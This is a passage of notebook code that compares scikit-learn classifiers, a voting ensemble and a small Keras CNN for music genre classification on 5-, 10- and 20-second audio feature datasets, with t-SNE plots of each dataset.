#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("Perplexity 30")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'sigmoid', random_state = 42, gamma = 'scale')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
model.fit(x_train,y_train)
y_pred = model.predict(x_test)
y_pred_train = model.predict(x_train)
acc = model.score(x_test,y_test)
acc1 = model.score(x_train,y_train)
print('training accuracy',acc1)
print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=4000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
models = list()
models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
models.append(('svm', SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')))
models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
ensemble = VotingClassifier(estimators=models, voting='hard')
return ensemble
ensemble = voting()
ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
yp = ensemble.predict(x_test)
print(accuracy_score(y_test,yp))
yp = ensemble.predict(x_train)
print(accuracy_score(y_train,yp))
data.shape
"""#**5 second dataset**"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_test_all_genres.csv')
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.fit_transform(x_test)
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig, img = plt.subplots(1,1,figsize=(15,5),sharex='col', sharey='row')
ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 5-sec length samples")
plt.xlabel("Dimension 1")
plt.ylabel("Dimension 2")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE(n_components=3).fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
ax11 = ax.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1],tsneDatasetOneTwoDimPerp_30[:,2], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 5-sec length samples")
plt.xlabel("Dimension 1")
plt.ylabel("Dimension 2")
plt.zlabel("Dimension 3")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=1000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
models = list()
models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
models.append(('svm', SVC(kernel = 'linear', random_state = 42, gamma = 'scale')))
models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
ensemble = VotingClassifier(estimators=models, voting='hard')
return ensemble
ensemble = voting()
#ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
import numpy as np
import random
from keras.layers import Conv2D, BatchNormalization, Dense, MaxPool2D, Input, ZeroPadding2D, MaxPooling2D, Flatten
from keras.models import Sequential
from keras.utils import np_utils
import pickle
from keras.optimizers import SGD
from keras.models import load_model
model = Sequential()
model.add(ZeroPadding2D(padding=(1,1)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
history = model.fit(x_train,y_train,batch_size=100,epochs=25)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1]*100))
"""#**10 second dataset**"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.fit_transform(x_test)
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig, img = plt.subplots(1,1,figsize=(15,5),sharex='col', sharey='row')
ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 10-sec length samples")
plt.xlabel("Dimension 1")
plt.ylabel("Dimension 2")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE(n_components=3).fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
ax11 = ax.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1],tsneDatasetOneTwoDimPerp_30[:,2], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 10-sec length samples")
ax.set_xlabel("Dimension 1")
ax.set_ylabel("Dimension 2")
ax.set_zlabel("Dimension 2")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=1000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
models = list()
models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
models.append(('svm', SVC(kernel = 'linear', random_state = 42, gamma = 'scale')))
models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
ensemble = VotingClassifier(estimators=models, voting='hard')
return ensemble
ensemble = voting()
#ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
"""#**20 second dataset**"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.fit_transform(x_test)
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE().fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig, img = plt.subplots(1,1,figsize=(15,5),sharex='col', sharey='row')
ax11 = img.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 20-sec length samples")
plt.xlabel("Dimension 1")
plt.ylabel("Dimension 2")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
def tsne2D(): # this function is used to apply tsne on dataset_1 to reduce it to two dimensions
